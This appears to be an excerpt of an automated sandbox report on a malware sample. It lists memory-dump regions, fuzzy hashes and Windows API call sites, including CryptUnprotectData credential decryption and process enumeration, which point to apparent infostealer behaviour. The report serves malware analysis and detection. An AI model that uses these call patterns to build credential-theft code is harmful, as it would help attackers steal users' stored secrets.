                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                                • String ID:
                                • API String ID: 3040284667-0
                                • Opcode ID: a0cd5f30eb1fe3277af45cc30a5a192ae7e780b571490f40d1f72f3f1a7f4907
                                • Instruction ID: df48f3a05c37a2efa285d48d44845ce7300666475d6b76219e2479966e7c2156
                                • Opcode Fuzzy Hash: a0cd5f30eb1fe3277af45cc30a5a192ae7e780b571490f40d1f72f3f1a7f4907
                                • Instruction Fuzzy Hash: 2421E4B2518301AF8354DF65D88889BBBF8FED8314F408A1EF599D3220E730D5088BA6
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0039775E
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00397765
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0039778D
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 003977AD
                                • LocalFree.KERNEL32(?), ref: 003977B7
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                • String ID:
                                • API String ID: 2609814428-0
                                • Opcode ID: 6265a776499dd1941917503e213f86670e7fe35670362e02dd0cf5cdb66f7771
                                • Instruction ID: e0b7974ac0550246ea55debe436b346bdfbde6f25607419ba45e490465946d20
                                • Opcode Fuzzy Hash: 6265a776499dd1941917503e213f86670e7fe35670362e02dd0cf5cdb66f7771
                                • Instruction Fuzzy Hash: 86011E75B40308BFEB10DB949C4EFAA7B78EB44B15F104195FB09EA2C0D6B0A904CB94
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 7Te^$8cRf$aToC$c$v=e
                                • API String ID: 0-308265804
                                • Opcode ID: b96cfd0542450ab7feee18b4fac75524ec656890ebbad9ad1df999ee2ab30dbc
                                • Instruction ID: 85eb19ab1513b2d5125b627af91253066c130063f3d2c7108c517e2effaa425a
                                • Opcode Fuzzy Hash: b96cfd0542450ab7feee18b4fac75524ec656890ebbad9ad1df999ee2ab30dbc
                                • Instruction Fuzzy Hash: A962F9F360C204AFE7046E2DEC8577AB7E9EB94320F1A4A3DE6C5C7744E63598018796
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: SK]$`.{o$`rUr$v}m
                                • API String ID: 0-392878372
                                • Opcode ID: d5712e4f38d63e68b79edc538faaec5af0839ef51feced02490b58e1be10ddb6
                                • Instruction ID: 95e8c36cc19b4462321a6c31282fcf193d49a3ba1cb799652b4ed2dfe5df534b
                                • Opcode Fuzzy Hash: d5712e4f38d63e68b79edc538faaec5af0839ef51feced02490b58e1be10ddb6
                                • Instruction Fuzzy Hash: F2B2F9F3A08204AFE3046E2DEC8567BBBE9EBD4720F16493DEAC4C7744E63558058697
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: /skipactivexreg$A0{_$Ipn$j/9
                                • API String ID: 0-463640712
                                • Opcode ID: 80d9bb98c6b1e404c4529370c8d4522f7f062926ecc5055951229d836c932957
                                • Instruction ID: 103ab632e2c85dac1bf6ad6f82a159ab42107352ec1ae298b7338436e20b2bff
                                • Opcode Fuzzy Hash: 80d9bb98c6b1e404c4529370c8d4522f7f062926ecc5055951229d836c932957
                                • Instruction Fuzzy Hash: F1B2F4F3A0C6049FE304AE2DEC8567ABBE5EF94320F16493DEAC5C7344EA3558058697
                                APIs
                                  • Part of subcall function 003B71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 003B71FE
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 003B3A96
                                • Process32First.KERNEL32(00000000,00000128), ref: 003B3AA9
                                • Process32Next.KERNEL32(00000000,00000128), ref: 003B3ABF
                                  • Part of subcall function 003B7310: lstrlen.KERNEL32(------,00395BEB), ref: 003B731B
                                  • Part of subcall function 003B7310: lstrcpy.KERNEL32(00000000), ref: 003B733F
                                  • Part of subcall function 003B7310: lstrcat.KERNEL32(?,------), ref: 003B7349
                                  • Part of subcall function 003B7280: lstrcpy.KERNEL32(00000000), ref: 003B72AE
                                • CloseHandle.KERNEL32(00000000), ref: 003B3BF7
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                • String ID:
                                • API String ID: 1066202413-0
                                • Opcode ID: d28f53ebdb8dfad2fdf971aba370d9ddf9beac8c69597bbabcff5e212fad9a84
                                • Instruction ID: a47d3ce613ebdc91b4c73948582f07197c5017647868b41e6cc21c37f496b896
                                • Opcode Fuzzy Hash: d28f53ebdb8dfad2fdf971aba370d9ddf9beac8c69597bbabcff5e212fad9a84
                                • Instruction Fuzzy Hash: CB811430905624CFC71ACF19C888B95B7F1FF44328F2AC1A9D5099B6A6D7769D86CF80
                                APIs
                                • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 0039EA76
                                • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0039EA7E
                                • lstrcat.KERNEL32(003BCFEC,003BCFEC), ref: 0039EB27
                                • lstrcat.KERNEL32(003BCFEC,003BCFEC), ref: 0039EB49
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$BinaryCryptStringlstrlen
                                • String ID:
                                • API String ID: 189259977-0
                                • Opcode ID: 791cab09f1c5f1cbc23e6ba38235ffb36143109e1a4badae9988ab5376abb0a9
                                • Instruction ID: 2a18db116bc67656f7728a0cede35b5e1589660a78e4ecfa0a24648ed9942605
                                • Opcode Fuzzy Hash: 791cab09f1c5f1cbc23e6ba38235ffb36143109e1a4badae9988ab5376abb0a9
                                • Instruction Fuzzy Hash: 4F31C475A14119ABDB10DB58EC49FFFB77DEF44705F0441A9FA09E2240DBB05A088BA1
                                APIs
                                • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 003B40CD
                                • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 003B40DC
                                • RtlAllocateHeap.NTDLL(00000000), ref: 003B40E3
                                • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 003B4113
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptHeapString$AllocateProcess
                                • String ID:
                                • API String ID: 3825993179-0
                                • Opcode ID: 7c4c939662b3265bbdf8817a580fc3ff481d7677ca213feaadc62dafbb35f0d8
                                • Instruction ID: 2f1cff0e274b70d218132c754791001e3303ac6e123c1186ee58b0dfe3a91c1d
                                • Opcode Fuzzy Hash: 7c4c939662b3265bbdf8817a580fc3ff481d7677ca213feaadc62dafbb35f0d8
                                • Instruction Fuzzy Hash: 84015A74600205AFDB109FA5DC89FAABBADEF94315F108059FE0897240DA719940DBA4
                                APIs
                                • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00399B3B
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 00399B4A
                                • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00399B61
                                • LocalFree.KERNEL32 ref: 00399B70
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptLocalString$AllocFree
                                • String ID:
                                • API String ID: 4291131564-0
                                • Opcode ID: 6dc51ef0922e5a702a0172ce2ad6382a59843e93d2f6eb787f204956957f3689
                                • Instruction ID: a128f4963679e1cfeac8e7df350788ade1d0638200c5710aafccbb671a16f136
                                • Opcode Fuzzy Hash: 6dc51ef0922e5a702a0172ce2ad6382a59843e93d2f6eb787f204956957f3689
                                • Instruction Fuzzy Hash: FBF01D70340712AFEB311F69AC4EF567BA8EF14B50F250115FA45EA2D0D7B59844CAA4
                                APIs
                                • CoCreateInstance.COMBASE(003BB110,00000000,00000001,003BB100,?), ref: 003ACB06
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 003ACB46
                                • lstrcpyn.KERNEL32(?,?,00000104), ref: 003ACBC9
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                                • String ID:
                                • API String ID: 1940255200-0
                                • Opcode ID: c281f0df708efd594d79e67bf5ac016c2242d52c203ed359b2b53c51d63702db
                                • Instruction ID: f27638604731b7e9c9a570a856b384d58109ef60ee505461e664c5a2dda22a3f
                                • Opcode Fuzzy Hash: c281f0df708efd594d79e67bf5ac016c2242d52c203ed359b2b53c51d63702db
                                • Instruction Fuzzy Hash: 0E317871A40614BFD711DB98CC96FEAB7B9DB88B14F104184FA04EB2D0D7B1AD44CBA0
                                APIs
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00399B9F
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00399BB3
                                • LocalFree.KERNEL32(?), ref: 00399BD7
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$AllocCryptDataFreeUnprotect
                                • String ID:
                                • API String ID: 2068576380-0
                                • Opcode ID: 2fcfe0d6373a4ce057314b31edc290dad3687c734d11c2bb4543562d55a38d0e
                                • Instruction ID: 6f35c391deb14dfaebb41db2120dcd50807f92af137de6a279d7538b04d3406c
                                • Opcode Fuzzy Hash: 2fcfe0d6373a4ce057314b31edc290dad3687c734d11c2bb4543562d55a38d0e
                                • Instruction Fuzzy Hash: 510112B5E41309AFD7109BA4DC49FAEB778EB44700F104559EA04AB280D7B49904C7E5
